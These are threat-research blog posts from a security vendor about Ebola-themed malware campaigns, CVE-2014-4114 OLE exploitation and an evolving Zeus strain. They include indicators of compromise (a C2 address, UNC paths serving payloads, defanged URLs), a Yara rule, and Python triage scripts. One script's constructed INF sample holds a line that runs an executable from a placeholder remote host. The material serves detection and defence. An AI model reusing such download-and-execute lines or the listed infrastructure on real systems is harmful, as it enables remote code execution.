Ebola Spreads - In Cyber Attacks Too
Posted by uwang on 23 October 2014 12:08 PM

The Ebola virus has been spreading in West Africa since it first appeared in Guinea in December 2013. Its rising infection rate, high mortality rate, and challenging isolation and containment requirements have raised alarm worldwide.

Against that backdrop, Websense® Security Labs has found two distinct malicious campaigns that take advantage of the Ebola outbreak, and it is safe to assume that the topic will continue to be abused.


DarkKomet RAT/Backdoor Campaign

Beginning October 10, 2014, the Websense® ThreatSeeker® Intelligence Cloud has detected thousands of malicious emails that use the Ebola topic as the lure. The subject line is:

  • Subject: Ebola Safety Tips-By WHO

At the beginning of the campaign, the messages contained a redirect URL that led victims to a download location for a RAR archive containing the DarkKomet RAT/Backdoor. DarkKomet is a Remote Administration Tool (RAT) that gives an attacker full control of the infected machine and is used to steal information. The campaign later evolved to attach the executable directly, and then to attach a RAR archive containing the executable. The sample below shows the RAR attachment variant.

The malware in this campaign contacted a server located in Romania at 5.254.112.46:1604 (TCP port 1604 is DarkKomet's default listening port, which makes the destination port a useful secondary indicator).

ThreatScope sandbox analysis classified the samples as malicious. Here are two file variants from the campaign:

SHA1: e2bdede8375da63998562f55a77d4b078d3b5646     ThreatScope Analysis Report: Link

SHA1: 91ff874eb5bde1bb6703e01d7603d3126ddd01fc     ThreatScope Analysis Report: Link

CVE-2014-4114 & CVE-2014-6352 - Windows OLE Remote Code Execution Vulnerabilities


On October 14, 2014, iSIGHT Partners disclosed CVE-2014-4114, a vulnerability used in the Sandworm campaign that targeted NATO, the European Union, and organizations in the telecommunications and energy sectors. CVE-2014-4114 allows remote code execution if a user opens a specially crafted Microsoft Office file containing an OLE object. It affects all supported releases of Microsoft Windows except Windows Server 2003. Because the flaw is a logic ('design') error in how the OLE packager handles embedded objects rather than a memory corruption bug, there is no shellcode to stop, and memory-safety mitigations such as DEP and ASLR do not help: the exploit simply causes an embedded INF or executable to be installed and run. Example exploit code for CVE-2014-4114 has been posted publicly, so criminal actors can use it to build malicious PowerPoint files that spread malware. Shortly after the disclosure of CVE-2014-4114, a very similar vulnerability that also abuses OLE objects surfaced and was assigned CVE-2014-6352. CVE-2014-4114 was patched by Microsoft in MS14-060; at the time of writing, CVE-2014-6352 still awaits a patch.


Websense® Security Labs has noticed that the Ebola topic is also being abused in relation to CVE-2014-4114. A sample obtained from a third-party source, named "Ebola in American.pps", leveraged CVE-2014-4114 to download and execute its payload from a remote host via UNC paths, that is, over SMB (TCP port 445). Most organizations do not allow SMB connections to public Internet addresses, so this delivery method frequently fails outside unfiltered networks; an outbound SMB connection attempt to an external IP is itself a useful indicator.

  • \\220.135.249.228\public\install.inf
  • \\220.135.249.228\public\word.exe


Documents that exploit CVE-2014-6352 can be surfaced with Yara. The rule below can be run against Microsoft Office files to flag documents carrying an embedded Ole10Native package that contains a PE executable, which is the artifact these exploits rely on. Note that it keys on the artifact rather than on the vulnerability itself, so it will also hit benign documents with embedded executables; it could be tightened and extended to cover INF payloads, as used by the sample above:

rule cve_2014_6352
{
    strings:
        // CFB "Root Entry" directory entry: UTF-16LE name padded to 64 bytes, name length 0x16, type 0x05 (root storage)
        $rootentry = {52 00 6F 00 6F 00 74 00 20 00 45 00 6E 00 74 00 72 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 00 05 00 ff ff ff ff ff ff ff ff 01 00 00 00}
        // "Ole10Native" stream name in UTF-16LE (the embedded OLE package); tolerates lower-case l/e
        $ole10native = {4F 00 ( 4C | 6C ) 00 ( 45 | 65 ) 00 31 00 30 00 4E 00 61 00 74 00 69 00 76 00 65 00 00}
        // DOS stub of a PE image: a Windows executable is embedded somewhere in the document
        $c = "This program cannot be run in DOS mode"
    condition:
        ($rootentry or $ole10native) and $c
}
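As an added illustration (not part of the original post and not Websense tooling), the following Python script applies the same logic as the rule above to a file and goes a step beyond it: it also walks the embedded OLE parts of OOXML packages (.pptx/.ppsx store them under ppt/embeddings/oleObject*.bin) and pulls out ASCII UNC paths like the ones seen in the sample, so an analyst gets the delivery host straight from the triage output. The constants, function names and the constructed test blob are this example's own; the RFC 5737 address 192.0.2.10 is a placeholder, not an indicator from the campaign.

```python
import io
import re
import zipfile

# Magic of an OLE compound file (legacy .doc/.ppt/.pps and embedded oleObject*.bin parts)
CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
# "Root Entry" directory entry: UTF-16LE name, 44 bytes of padding, name length 0x16, type 0x05 (root storage)
ROOT_ENTRY_RE = re.compile("Root Entry".encode("utf-16-le") + b"\x00{44}\x16\x00\x05")
# "Ole10Native" stream name in UTF-16LE; like the YARA rule, accept lower-case l/e
OLE10NATIVE_RE = re.compile(rb"O\x00[Ll]\x00[Ee]\x001\x000\x00N\x00a\x00t\x00i\x00v\x00e\x00\x00")
# DOS stub every PE image carries: an executable is embedded in the document
DOS_STUB = b"This program cannot be run in DOS mode"
# ASCII UNC path to a dotted-quad host, e.g. \\192.0.2.10\public\word.exe (UTF-16 paths are not covered)
UNC_RE = re.compile(rb"\\\\\d{1,3}(?:\.\d{1,3}){3}\\[^\x00-\x20]+")


def scan_blob(data: bytes) -> dict:
    """Apply the rule's string checks to one OLE blob and collect UNC paths for triage."""
    return {
        "is_cfb": data.startswith(CFB_MAGIC),
        "root_entry": ROOT_ENTRY_RE.search(data) is not None,
        "ole10native": OLE10NATIVE_RE.search(data) is not None,
        "pe_stub": DOS_STUB in data,
        "unc_paths": sorted({m.decode("latin-1") for m in UNC_RE.findall(data)}),
    }


def merge(a: dict, b: dict) -> dict:
    """Combine results from several embedded parts: any hit counts, paths are unioned."""
    out = {k: (a[k] or b[k]) for k in a if k != "unc_paths"}
    out["unc_paths"] = sorted(set(a["unc_paths"]) | set(b["unc_paths"]))
    return out


def scan_office_file(data: bytes) -> dict:
    """Scan a legacy OLE file directly; for an OOXML (ZIP) file scan each embedded OLE part."""
    if data[:2] != b"PK":
        return scan_blob(data)
    result = scan_blob(b"")
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            low = name.lower()
            if "/embeddings/" in low and low.endswith(".bin"):
                result = merge(result, scan_blob(z.read(name)))
    return result


def is_suspicious(result: dict) -> bool:
    """Same condition as the YARA rule: a CFB directory entry (root or Ole10Native) plus a PE stub."""
    return (result["root_entry"] or result["ole10native"]) and result["pe_stub"]


def build_constructed_samples():
    """Constructed test data, not real malware: a fake OLE blob holding an Ole10Native package
    with a PE stub and an INF that names a UNC path, plus the same blob wrapped as an OOXML part."""
    root = ("Root Entry".encode("utf-16-le") + b"\x00" * 44
            + b"\x16\x00\x05\x00" + b"\xff" * 8 + b"\x01\x00\x00\x00")
    stream_name = "\x01Ole10Native".encode("utf-16-le") + b"\x00\x00"
    payload = b"MZ\x90\x00" + b"\x00" * 60 + DOS_STUB + b"\r\n$\x00"
    inf = (b"[Version]\r\nSignature=\"$CHICAGO$\"\r\n[DefaultInstall]\r\n"
           b"RunPreSetupCommands=\\\\192.0.2.10\\public\\word.exe\r\n")  # placeholder address
    blob = CFB_MAGIC + b"\x00" * 504 + root + stream_name + b"\x00" * 40 + payload + inf
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("ppt/embeddings/oleObject1.bin", blob)
    return blob, buf.getvalue()


if __name__ == "__main__":
    for label, sample in zip(("legacy .pps", "ooxml .ppsx"), build_constructed_samples()):
        r = scan_office_file(sample)
        print(label, "suspicious" if is_suspicious(r) else "clean", r["unc_paths"])
```

Because the check is a string search rather than a full CFB parse, it has the same limits as the rule: a document with a benign embedded executable is flagged too, so treat a hit as a triage signal and confirm by extracting the package.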

 

Websense customers are protected against this threat with ACE, our Advanced Classification Engine, at the different stages of the attack detailed below:

 

  • Stage 2 (Lure) – ACE protects against lure email messages and URLs containing the threat.
  • Stage 4 (Exploit) – ACE has real-time detection for exploit code that attempts to deliver the threat.
  • Stage 5 (Dropper) – ACE has detection for the malicious files delivered by this threat.
  • Stage 6 (Call Home) – ACE detects the communication to the associated C&C points associated with this threat.

 

Blog contributors: Ulysses Wang, Ran Mosessco, Nicholas Griffin.


Jul 7


Websense Security Labs™ has identified a Zeus strain whose information-stealing procedures appear to be an evolution of the 'DNA' of earlier emerging Zeus variants. The Zeus variants in the campaign described below also use droppers with the Windows 'PIF' file extension, which Windows hides from the user: an extension that was popular many years ago, was often associated with viruses then, and now appears to be making a comeback.

 

Websense® ThreatSeeker® Intelligence Cloud has been tracking a low-volume malicious email campaign over the last few months that uses exploits and social engineering tricks to spread this evolving breed of the Zeus banking malware. The Zeus variants in the campaign have persistently evolved and adapted their information-stealing procedures (the 'hooking' routines the bot inserts into browsers and other processes), which are a direct evolution of a previous variant dubbed 'Zberp'. This indicates a sustained effort to evade detection by client-side security software.

 

In this blog we look at some example emails that typify the lures used in this campaign. We then examine how we believe the actors behind this Zeus strain repeatedly modified Zeus' hooking routines, and employed other tactics, to evade detection by client-side and network-based security software.

 

Co-Writer: Nick Griffin.

 

The Lure Emails 

 

The lure emails typically carry subjects designed to entice the target to download and run a file from a URL; examples include "eFax message from fax #", "Payment confirmation", "Pending consumer complaint" and "Failed delivery for package". The messages carry no attachment, only a URL to a ZIP file containing a PIF file, which is the Zeus dropper. PIF is an executable extension like .exe and behaves like any other executable. Its direct advantage to the attacker is that Windows Explorer never displays the .pif extension, even when 'Hide extensions for known file types' is turned off, because the piffile type carries the NeverShowExt registry flag. The campaign compounds this by naming the PIF files as 'PDF' documents, so that a user who can see extensions is deceived anyway.

 

We were at first surprised to see PIF files in this campaign, because they are mostly associated with old virus threats from many years ago and are rarely used by modern malware. PIF (Program Information File) was designed to hold the settings under which a given DOS program should be run. Windows' ShellExecute handles a .pif by content rather than by extension: a PIF that actually contains a PE executable is simply run as one. Combined with the hidden extension, this makes PIFs convenient for social engineering: the target sees what looks like a document, double-clicks it, and is infected.

 

Zeus dropper inside the ZIP file example:

The lure emails are of good quality: the messages contain no spelling mistakes and at times include images to appear more convincing (example screenshots are included below). The URLs that lead to the Zeus droppers are of two kinds: domains registered only a few days earlier, and compromised websites. As is common with modern malware, the Zeus PIF droppers are 'crypted', meaning the file was repackaged to evade antivirus and other file-scanning solutions.
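To show the checks a mail gateway or analyst script can apply to a lure archive like the ones described above, here is an added Python example (not code from the original post). It flags executable extensions including .pif, extensions that Explorer never displays, document-themed names with a non-document extension (the campaign's 'pdf_' naming), and members whose content is a PE image regardless of what the name says. The extension lists and the constructed ZIP with a fake MZ stub are assumptions of this example.

```python
import io
import os
import zipfile

# Extensions Windows executes on double-click; .pif is among them and behaves like .exe
EXEC_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".cpl",
             ".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta"}
# File types whose extension Explorer never shows (NeverShowExt), whatever the folder options say
ALWAYS_HIDDEN_EXTS = {".pif", ".lnk", ".url", ".scf"}
# Extensions a user reads as "a document"; used to spot double extensions and themed names
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
# Extensions where a PE image is what the name promises, so the MZ sniff is not a finding
NATIVE_EXE_EXTS = {".exe", ".scr", ".com", ".cpl"}


def sniff_pe(head: bytes) -> bool:
    """Windows runs a .pif by content: if the file starts with an 'MZ' header it is just an .exe."""
    return head[:2] == b"MZ"


def triage_member(name: str, head: bytes) -> list:
    """Return human-readable findings for one archive member given its name and first bytes."""
    findings = []
    base = os.path.basename(name.replace("\\", "/"))
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    inner_ext = os.path.splitext(stem)[1].lower()
    if ext in EXEC_EXTS:
        findings.append(f"executable extension {ext}")
    if ext in ALWAYS_HIDDEN_EXTS:
        findings.append(f"{ext} is never shown by Explorer (NeverShowExt)")
    if inner_ext in DOC_EXTS:
        findings.append(f"double extension {inner_ext}{ext}")
    # names like pdf_canpost_....pif or ftc_pdf_complaint.pif: a 'pdf' token but no document extension
    if "pdf" in stem.lower().split("_") and ext not in DOC_EXTS:
        findings.append("document-themed name with non-document extension")
    if sniff_pe(head) and ext not in NATIVE_EXE_EXTS:
        findings.append(f"PE image (MZ) behind {ext or 'no extension'}")
    return findings


def triage_zip(data: bytes) -> dict:
    """Map each flagged member of a ZIP to its findings; an empty dict means nothing was flagged."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            with z.open(info) as fh:
                head = fh.read(2)  # only the magic is needed for the content sniff
            findings = triage_member(info.filename, head)
            if findings:
                report[info.filename] = findings
    return report


def build_constructed_lure() -> bytes:
    """Constructed archive that mimics the campaign's naming; the 'PE' is a bare MZ stub, not malware."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("pdf_canpost_RT000961269SG.pif", b"MZ\x90\x00" + b"\x00" * 60)
        z.writestr("readme.txt", b"tracking information")
    return buf.getvalue()


if __name__ == "__main__":
    for member, findings in triage_zip(build_constructed_lure()).items():
        print(member)
        for f in findings:
            print("  -", f)
```

Note that the content sniff is what catches the case the extension tricks are built to hide: whatever the name says, a member that starts with MZ is a Windows executable and should be treated as one.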

 

Last week we observed this campaign using email themes that appeal to Canadian targets, and we noticed that the dropped Zeus variants specifically targeted Canadian banks (more on that in the next section).

 

Here are a few VirusTotal references to the Zeus PIF Dropper included in this campaign and screenshots of the lure emails they were a part of:

 

Email subject: Failed delivery for package #1398402

File name: pdf_canpost_RT000961269SG.zip

VirusTotal detection rate: 2%.

ThreatScope analysis: link

 

Email subject: Pending consumer complaint

File name: ftc_pdf_complaint.zip

VirusTotal detection rate: 11% 

ThreatScope analysis: link

 

Email subject: Your Order #742830017 - PROCESSED

File name: pdf_eticket_QB742830017CA.zip

VirusTotal detection rate: 9% 

ThreatScope analysis: link

 

Lure email examples:

Hooking Detection Evasion Evolution

 

Looking under the hood of the Zeus binaries spread by this campaign shows the effort made to evade client-side security software, especially products that alert on 'malicious hooks', the places where the malware inserts procedures to eavesdrop on legitimate processes such as browsers. One interesting observation is that the code appears to be an evolution of the hooking procedures used by the Zeus variant known as 'Zberp'. On top of the hooking changes, the configuration file format is a modification of the one used by commonly seen Zeus variants. The following screenshots show the evolution of the evasion patterns across the Zeus PIF variants in this campaign compared with 'Zberp':

 

Hooking evolution:

The Growing Importance Of SSL Content Inspection

 

Decrypting the Zeus configuration files used in this campaign shows that the bot communicates and 'calls home' to its command and control servers over HTTPS (HTTP inside an SSL/TLS session); several entries in the configuration indicate this. The screenshots below show the URL the bot calls to download an update and the URL it uses to upload stolen information.

 

Looking into the command and control domains, we found that they all had valid, CA-signed certificates with a short three-month lifetime, issued under Comodo's 'Essential SSL' domain-validated product (see the certificate screenshots below). Browsers give users a layer of defense against untrusted certificates by warning and blocking access, but that defense does not apply here: a domain-validated certificate only proves control of the domain, which the actors have, so the connection looks legitimate. This gives the actors another layer of resilience and anonymity. Their malicious domains appear more trustworthy, and the traffic is much harder to inspect because it is encrypted with SSL. This may explain why the domains used by the variants we examined have low detection rates:

 

hxxps://billing-service.ru/skinny/phpinfo.php - VirusTotal detection rate: 4%

hxxps://invoice-maker.ru/flash/flashplayer.exe - VirusTotal detection rate: 2%

hxxp://crypto-coinz.ru/pizza.jpg - VirusTotal detection rate: 2%

hxxps://secure-checker.com - VirusTotal detection rate: 2%

 

Why does SSL inspection matter? Imagine a sandbox on your network that inspects executables passing through it. If it does not perform SSL inspection, it never sees a file that crossed the network inside an SSL session. In this case the bot updates itself by downloading an executable over SSL (for example hxxps://invoice-maker.ru/flash/flashplayer.exe), which defeats any sandbox that does not decrypt the traffic. Even without inspection, the TLS handshake still exposes the requested server name (SNI) and the server certificate in the clear, so logging those gives a fallback for spotting known C&C hosts, though not the downloaded file.


Zeus PIF variant configuration file:

Valid certificates employed by the command and control servers:

Zeus configuration file and the list of web injects targeting various banks in Canada:

Websense customers are protected against this threat with ACE, our Advanced Classification Engine, at the stages detailed below:

  • Stage 2 (Lure) – ACE protects against lure email messages containing the threat.
  • Stage 4 (Exploit Kit) – ACE has real-time detection for exploit code that attempts to deliver the threat.
  • Stage 5 (Payload) – ACE has detection for the malicious payloads delivered by this threat; SSL inspection is supported with Websense® TRITON® ThreatScope™
  • Stage 6 (Call Home) – ACE detects the communication to the associated C&C in real-time, supported by SSL inspection.

 

 

Conclusion

 

In this blog we covered a malicious email campaign that employs an evolving strain of the infamous Zeus malware. The campaign has been running for months in bursts of low-volume attacks, and has kept evolving to evade client-side security software. The actors behind it appear savvy about what is needed to keep their main criminal tool, the Zeus bot, active and undetected for long periods. Their persistence shows in the continual modification of the bot's 'DNA' to avoid detection, and in supporting techniques such as SSL-protected command and control servers, all in service of the campaign's ultimate purpose: data theft.

 

We were also able to connect the previously observed 'Zberp' Zeus strain to this campaign in terms of evolution, which shows that the 'cat and mouse' game continues. Since the Zeus source code was leaked in 2011, many evolving variants of the bot have been spawned by different cyber-criminal groups. New variants have been given different names, and we expect the list to keep growing. Strains that may at first look quite different often have the familiar Zeus at their core. Tracking and dissecting the evolution of a malware strain lets us know exactly what technical challenges come with it and what is required to stop it.